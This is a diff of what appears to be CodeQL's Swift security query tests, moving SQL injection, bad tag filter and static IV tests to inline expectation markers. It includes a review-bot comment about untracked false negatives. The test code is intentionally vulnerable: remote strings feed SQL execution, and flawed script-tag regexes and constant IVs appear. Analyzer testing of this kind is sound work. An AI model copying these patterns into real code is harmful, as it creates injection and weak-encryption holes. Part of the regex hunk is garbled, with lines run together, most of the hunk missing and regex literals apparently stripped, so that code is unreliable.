| GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:346:66:346:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:346:66:346:66 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:347:66:347:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:347:66:347:66 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:348:69:348:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:348:69:348:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:349:84:349:84 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:349:84:349:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:350:69:350:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:350:69:350:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:351:84:351:84 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:351:84:351:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:73:17:73:17 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:73:17:73:17 | unsafeQuery1 | This query depends on a $@. 
| SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:74:17:74:17 | unsafeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:74:17:74:17 | unsafeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:75:17:75:17 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:75:17:75:17 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:83:29:83:29 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:83:29:83:29 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:95:32:95:32 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:95:32:95:32 | remoteString | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:100:29:100:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:100:29:100:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:103:29:103:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:103:29:103:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:106:29:106:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:106:29:106:29 | unsafeQuery1 | This query depends on a $@. 
| SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:109:13:109:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:109:13:109:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:111:13:111:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:111:13:111:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:113:13:113:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:113:13:113:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:115:16:115:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:115:16:115:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:117:16:117:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:117:16:117:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:119:16:119:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:119:16:119:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:132:20:132:20 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:132:20:132:20 | remoteString | This query depends on a $@. 
| SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:50:22:50:22 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:50:22:50:22 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:52:14:52:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:52:14:52:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:53:14:53:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:53:14:53:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:54:14:54:43 | call to NSString.init(string:) | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:54:14:54:43 | call to NSString.init(string:) | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:55:14:55:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:55:14:55:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:57:16:57:16 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:57:16:57:16 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | This query depends on a $@. 
| sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:194:28:194:28 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:194:28:194:28 | buffer | This query depends on a $@. 
| sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:202:31:202:31 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:202:31:202:31 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:210:31:210:31 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:210:31:210:31 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.qlref b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.qlref index eaf19a94546e..654631d8a094 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.qlref +++ b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.qlref @@ -1 +1,2 @@ -queries/Security/CWE-089/SqlInjection.ql \ No newline at end of file +query: queries/Security/CWE-089/SqlInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-089/other.swift b/swift/ql/test/query-tests/Security/CWE-089/other.swift index 52cafbb15456..76edd815e14d 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/other.swift +++ b/swift/ql/test/query-tests/Security/CWE-089/other.swift 
@@ -43,18 +43,18 @@ class MyDatabase { // --- tests --- func test_heuristic(db: MyDatabase) throws { - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source _ = MyDatabase() // GOOD _ = MyDatabase(sql: "some_fixed_sql") // GOOD - _ = MyDatabase(sql: remoteString) // BAD + _ = MyDatabase(sql: remoteString) // BAD // $ Alert - db.execute1(remoteString) // BAD - db.execute2(remoteString) // BAD - db.execute3(NSString(string: remoteString)) // BAD - db.execute4(remoteString as! Sql) // BAD + db.execute1(remoteString) // BAD // $ Alert + db.execute2(remoteString) // BAD // $ Alert + db.execute3(NSString(string: remoteString)) // BAD // $ Alert + db.execute4(remoteString as! Sql) // BAD // $ Alert - db.query(sql: remoteString) // BAD + db.query(sql: remoteString) // BAD // $ Alert db.query(sqlLiteral: remoteString) // BAD [NOT DETECTED] db.query(sqlStatement: remoteString) // BAD [NOT DETECTED] db.query(sqliteStatement: remoteString) // BAD [NOT DETECTED] diff --git a/swift/ql/test/query-tests/Security/CWE-089/sqlite3_c_api.swift b/swift/ql/test/query-tests/Security/CWE-089/sqlite3_c_api.swift index 8498d89d68da..b0e53f15567a 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/sqlite3_c_api.swift +++ b/swift/ql/test/query-tests/Security/CWE-089/sqlite3_c_api.swift @@ -119,7 +119,7 @@ func sqlite3_finalize( func test_sqlite3_c_api(db: OpaquePointer?, buffer: UnsafeMutablePointer) { let localString = "user" - let remoteString = try! String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try! String(contentsOf: URL(string: "http://example.com/")!) // $ Source let remoteNumber = Int(remoteString) ?? 0 let unsafeQuery1 = remoteString 
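Review bot: In the other.swift hunk, the three trailing context lines `db.query(sqlLiteral: remoteString)`, `db.query(sqlStatement: remoteString)` and `db.query(sqliteStatement: remoteString)` still carry only the free-text `// BAD [NOT DETECTED]`. Now that the test uses inline expectations, these known SQL injection false negatives are recorded nowhere the test can check. I would annotate each one, e.g. `db.query(sqlLiteral: remoteString) // BAD [NOT DETECTED] // $ MISSING: Alert`, so the coverage gap is machine-checked and the test flags the line once the query starts reporting these sinks. `test_heuristic` runs past the end of the hunk, so any undetected cases further down would presumably need the same marker.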
@@ -130,9 +130,9 @@ func test_sqlite3_c_api(db: OpaquePointer?, buffer: UnsafeMutablePointer) // --- exec --- - let result1 = sqlite3_exec(db, unsafeQuery1, nil, nil, nil) // BAD - let result2 = sqlite3_exec(db, unsafeQuery2, nil, nil, nil) // BAD - let result3 = sqlite3_exec(db, unsafeQuery3, nil, nil, nil) // BAD + let result1 = sqlite3_exec(db, unsafeQuery1, nil, nil, nil) // BAD // $ Alert + let result2 = sqlite3_exec(db, unsafeQuery2, nil, nil, nil) // BAD // $ Alert + let result3 = sqlite3_exec(db, unsafeQuery3, nil, nil, nil) // BAD // $ Alert let result4 = sqlite3_exec(db, safeQuery1, nil, nil, nil) // GOOD let result5 = sqlite3_exec(db, safeQuery2, nil, nil, nil) // GOOD @@ -142,7 +142,7 @@ func test_sqlite3_c_api(db: OpaquePointer?, buffer: UnsafeMutablePointer) var stmt1: OpaquePointer? - if (sqlite3_prepare(db, unsafeQuery3, -1, &stmt1, nil) == SQLITE_OK) { // BAD + if (sqlite3_prepare(db, unsafeQuery3, -1, &stmt1, nil) == SQLITE_OK) { // BAD // $ Alert let result = sqlite3_step(stmt1) // ... } @@ -172,7 +172,7 @@ func test_sqlite3_c_api(db: OpaquePointer?, buffer: UnsafeMutablePointer) var stmt4: OpaquePointer? - if (sqlite3_prepare_v2(db, unsafeQuery3, -1, &stmt4, nil) == SQLITE_OK) { // BAD + if (sqlite3_prepare_v2(db, unsafeQuery3, -1, &stmt4, nil) == SQLITE_OK) { // BAD // $ Alert let result = sqlite3_step(stmt4) // ... } @@ -180,7 +180,7 @@ func test_sqlite3_c_api(db: OpaquePointer?, buffer: UnsafeMutablePointer) var stmt5: OpaquePointer? - if (sqlite3_prepare_v3(db, unsafeQuery3, -1, 0, &stmt5, nil) == SQLITE_OK) { // BAD + if (sqlite3_prepare_v3(db, unsafeQuery3, -1, 0, &stmt5, nil) == SQLITE_OK) { // BAD // $ Alert let result = sqlite3_step(stmt5) // ... } 
@@ -191,7 +191,7 @@ func test_sqlite3_c_api(db: OpaquePointer?, buffer: UnsafeMutablePointer) var stmt6: OpaquePointer? - if (sqlite3_prepare16(db, buffer, Int32(data.count), &stmt6, nil) == SQLITE_OK) { // BAD + if (sqlite3_prepare16(db, buffer, Int32(data.count), &stmt6, nil) == SQLITE_OK) { // BAD // $ Alert let result = sqlite3_step(stmt6) // ... } @@ -199,7 +199,7 @@ func test_sqlite3_c_api(db: OpaquePointer?, buffer: UnsafeMutablePointer) var stmt7: OpaquePointer? - if (sqlite3_prepare16_v2(db, buffer, Int32(data.count), &stmt7, nil) == SQLITE_OK) { // BAD + if (sqlite3_prepare16_v2(db, buffer, Int32(data.count), &stmt7, nil) == SQLITE_OK) { // BAD // $ Alert let result = sqlite3_step(stmt7) // ... } @@ -207,7 +207,7 @@ func test_sqlite3_c_api(db: OpaquePointer?, buffer: UnsafeMutablePointer) var stmt8: OpaquePointer? - if (sqlite3_prepare16_v3(db, buffer, Int32(data.count), 0, &stmt8, nil) == SQLITE_OK) { // BAD + if (sqlite3_prepare16_v3(db, buffer, Int32(data.count), 0, &stmt8, nil) == SQLITE_OK) { // BAD // $ Alert let result = sqlite3_step(stmt8) // ... } diff --git a/swift/ql/test/query-tests/Security/CWE-116/BadTagFilter.qlref b/swift/ql/test/query-tests/Security/CWE-116/BadTagFilter.qlref index 8186dfa236f1..67e973ba99e6 100644 --- a/swift/ql/test/query-tests/Security/CWE-116/BadTagFilter.qlref +++ b/swift/ql/test/query-tests/Security/CWE-116/BadTagFilter.qlref @@ -1 +1,2 @@ -queries/Security/CWE-116/BadTagFilter.ql \ No newline at end of file +query: queries/Security/CWE-116/BadTagFilter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-116/test.swift b/swift/ql/test/query-tests/Security/CWE-116/test.swift index e2e88135dd6f..be6cbc0dcdd2 100644 --- a/swift/ql/test/query-tests/Security/CWE-116/test.swift +++ b/swift/ql/test/query-tests/Security/CWE-116/test.swift 
@@ -76,18 +76,18 @@ func myRegexpVariantsTests(myUrl: URL) throws { let tainted = String(contentsOf: myUrl) // tainted // BAD - doesn't match newlines or `` - let re1 = try Regex(#".*?<\/script>"#).ignoresCase(true) + let re1 = try Regex(#".*?<\/script>"#).ignoresCase(true) // $ Alert _ = try re1.firstMatch(in: tainted) // BAD - doesn't match `` - let re2a = try Regex(#"(?is).*?<\/script>"#) + let re2a = try Regex(#"(?is).*?<\/script>"#) // $ Alert _ = try re2a.firstMatch(in: tainted) // BAD - doesn't match `` - let re2b = try Regex(#".*?<\/script>"#).ignoresCase(true).dotMatchesNewlines(true) + let re2b = try Regex(#".*?<\/script>"#).ignoresCase(true).dotMatchesNewlines(true) // $ Alert _ = try re2b.firstMatch(in: tainted) // BAD - doesn't match `` let options2c: NSRegularExpression.Options = [.caseInsensitive, .dotMatchesLineSeparators] - let ns2c = try NSRegularExpression(pattern: #".*?<\/script>"#, options: options2c) + let ns2c = try NSRegularExpression(pattern: #".*?<\/script>"#, options: options2c) // $ Alert _ = ns2c.firstMatch(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // GOOD 
@@ -110,71 +110,71 @@ func myRegexpVariantsTests(myUrl: URL) throws { _ = try re5.firstMatch(in: tainted) // BAD, does not match newlines - let re6 = try Regex(#")|([^\/\s>]+)[\S\s]*?>"#) + let re16 = try Regex(#"<(?:!--([\S|\s]*?)-->)|([^\/\s>]+)[\S\s]*?>"#) // $ Alert _ = try re16.firstMatch(in: tainted) // BAD - doesn't match comments with the right capture groups - let ns16 = try NSRegularExpression(pattern: #"<(?:!--([\S|\s]*?)-->)|([^\/\s>]+)[\S\s]*?>"#) + let ns16 = try NSRegularExpression(pattern: #"<(?:!--([\S|\s]*?)-->)|([^\/\s>]+)[\S\s]*?>"#) // $ Alert _ = ns16.firstMatch(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // BAD - capture groups - let re17 = try Regex(#"<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))"#) + let re17 = try Regex(#"<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))"#) // $ Alert _ = try re17.firstMatch(in: tainted) // BAD - capture groups - let ns17 = try NSRegularExpression(pattern: #"<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))"#, options: .caseInsensitive) + let ns17 = try NSRegularExpression(pattern: #"<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))"#, options: .caseInsensitive) // $ Alert _ = ns17.firstMatch(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // BAD - too strict matching on the end tag - let ns2_1 = try NSRegularExpression(pattern: #"]*>([\s\S]*?)<\/script>"#, options: .caseInsensitive) + let ns2_1 = try NSRegularExpression(pattern: #"]*>([\s\S]*?)<\/script>"#, options: .caseInsensitive) // $ Alert _ = ns2_1.matches(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // BAD - capture groups - let ns2_2 = try 
NSRegularExpression(pattern: #"(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)"#, options: .caseInsensitive) + let ns2_2 = try NSRegularExpression(pattern: #"(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)"#, options: .caseInsensitive) // $ Alert _ = ns2_2.matches(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // BAD - capture groups - let ns2_3 = try NSRegularExpression(pattern: #"<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))"#) + let ns2_3 = try NSRegularExpression(pattern: #"<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))"#) // $ Alert _ = ns2_3.matches(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // BAD - capture groups - let ns2_4 = try NSRegularExpression(pattern: #"|<([^>]*?)>"#) + let ns2_4 = try NSRegularExpression(pattern: #"|<([^>]*?)>"#) // $ Alert _ = ns2_4.matches(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // GOOD - it's used with the ignorecase flag @@ -222,7 +222,7 @@ func myRegexpVariantsTests(myUrl: URL) throws { _ = ns2_5.matches(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // BAD - doesn't match --!> - let ns2_6 = try NSRegularExpression(pattern: #"-->"#) + let ns2_6 = try NSRegularExpression(pattern: #"-->"#) // $ Alert _ = ns2_6.matches(in: tainted, range: NSMakeRange(0, tainted.utf16.count)) // GOOD diff --git a/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.expected b/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.expected index 02fdbe6a6a48..688f7cb4e987 100644 --- a/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.expected 
+++ b/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.expected 
@@ -1,3 +1,33 @@ +#select +| rncryptor.swift:68:104:68:104 | myConstIV1 | rncryptor.swift:60:24:60:24 | 0 | rncryptor.swift:68:104:68:104 | myConstIV1 | The static value '0' is used as an initialization vector for encryption. | +| rncryptor.swift:70:104:70:104 | myConstIV2 | rncryptor.swift:61:24:61:24 | 123 | rncryptor.swift:70:104:70:104 | myConstIV2 | The static value '123' is used as an initialization vector for encryption. | +| rncryptor.swift:72:84:72:84 | myConstIV3 | rncryptor.swift:62:24:62:34 | [...] | rncryptor.swift:72:84:72:84 | myConstIV3 | The static value '[...]' is used as an initialization vector for encryption. | +| rncryptor.swift:74:84:74:84 | myConstIV4 | rncryptor.swift:63:24:63:24 | iv | rncryptor.swift:74:84:74:84 | myConstIV4 | The static value 'iv' is used as an initialization vector for encryption. | +| rncryptor.swift:77:125:77:125 | myConstIV1 | rncryptor.swift:60:24:60:24 | 0 | rncryptor.swift:77:125:77:125 | myConstIV1 | The static value '0' is used as an initialization vector for encryption. | +| rncryptor.swift:79:133:79:133 | myConstIV2 | rncryptor.swift:61:24:61:24 | 123 | rncryptor.swift:79:133:79:133 | myConstIV2 | The static value '123' is used as an initialization vector for encryption. | +| rncryptor.swift:81:105:81:105 | myConstIV3 | rncryptor.swift:62:24:62:34 | [...] | rncryptor.swift:81:105:81:105 | myConstIV3 | The static value '[...]' is used as an initialization vector for encryption. | +| rncryptor.swift:83:113:83:113 | myConstIV4 | rncryptor.swift:63:24:63:24 | iv | rncryptor.swift:83:113:83:113 | myConstIV4 | The static value 'iv' is used as an initialization vector for encryption. | +| test.swift:54:17:54:17 | iv | test.swift:99:25:99:120 | [...] | test.swift:54:17:54:17 | iv | The static value '[...]' is used as an initialization vector for encryption. 
| +| test.swift:112:36:112:36 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:112:36:112:36 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:113:36:113:36 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:113:36:113:36 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:118:41:118:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:118:41:118:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:122:41:122:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:122:41:122:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:123:41:123:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:123:41:123:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:128:33:128:33 | iv | test.swift:99:25:99:120 | [...] | test.swift:128:33:128:33 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:129:33:129:33 | iv2 | test.swift:85:3:85:3 | this string is constant | test.swift:129:33:129:33 | iv2 | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:130:39:130:39 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:130:39:130:39 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | +| test.swift:135:22:135:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:135:22:135:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:139:22:139:22 | iv | test.swift:99:25:99:120 | [...] 
| test.swift:139:22:139:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:140:22:140:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:140:22:140:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:145:22:145:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:145:22:145:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:146:22:146:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:146:22:146:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:147:22:147:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:147:22:147:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:153:22:153:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:153:22:153:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:157:24:157:24 | iv | test.swift:99:25:99:120 | [...] | test.swift:157:24:157:24 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:161:22:161:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:161:22:161:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:162:22:162:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:162:22:162:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:167:22:167:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:167:22:167:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | +| test.swift:168:22:168:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:168:22:168:22 | iv | The static value '[...]' is used as an initialization vector for encryption. 
| edges | rncryptor.swift:60:19:60:25 | call to Data.init(_:) | rncryptor.swift:68:104:68:104 | myConstIV1 | provenance | | | rncryptor.swift:60:19:60:25 | call to Data.init(_:) | rncryptor.swift:77:125:77:125 | myConstIV1 | provenance | | 
@@ -87,33 +117,3 @@ nodes | test.swift:167:22:167:22 | iv | semmle.label | iv | | test.swift:168:22:168:22 | iv | semmle.label | iv | subpaths -#select -| rncryptor.swift:68:104:68:104 | myConstIV1 | rncryptor.swift:60:24:60:24 | 0 | rncryptor.swift:68:104:68:104 | myConstIV1 | The static value '0' is used as an initialization vector for encryption. | -| rncryptor.swift:70:104:70:104 | myConstIV2 | rncryptor.swift:61:24:61:24 | 123 | rncryptor.swift:70:104:70:104 | myConstIV2 | The static value '123' is used as an initialization vector for encryption. | -| rncryptor.swift:72:84:72:84 | myConstIV3 | rncryptor.swift:62:24:62:34 | [...] | rncryptor.swift:72:84:72:84 | myConstIV3 | The static value '[...]' is used as an initialization vector for encryption. | -| rncryptor.swift:74:84:74:84 | myConstIV4 | rncryptor.swift:63:24:63:24 | iv | rncryptor.swift:74:84:74:84 | myConstIV4 | The static value 'iv' is used as an initialization vector for encryption. | -| rncryptor.swift:77:125:77:125 | myConstIV1 | rncryptor.swift:60:24:60:24 | 0 | rncryptor.swift:77:125:77:125 | myConstIV1 | The static value '0' is used as an initialization vector for encryption. | -| rncryptor.swift:79:133:79:133 | myConstIV2 | rncryptor.swift:61:24:61:24 | 123 | rncryptor.swift:79:133:79:133 | myConstIV2 | The static value '123' is used as an initialization vector for encryption. | -| rncryptor.swift:81:105:81:105 | myConstIV3 | rncryptor.swift:62:24:62:34 | [...] | rncryptor.swift:81:105:81:105 | myConstIV3 | The static value '[...]' is used as an initialization vector for encryption. | -| rncryptor.swift:83:113:83:113 | myConstIV4 | rncryptor.swift:63:24:63:24 | iv | 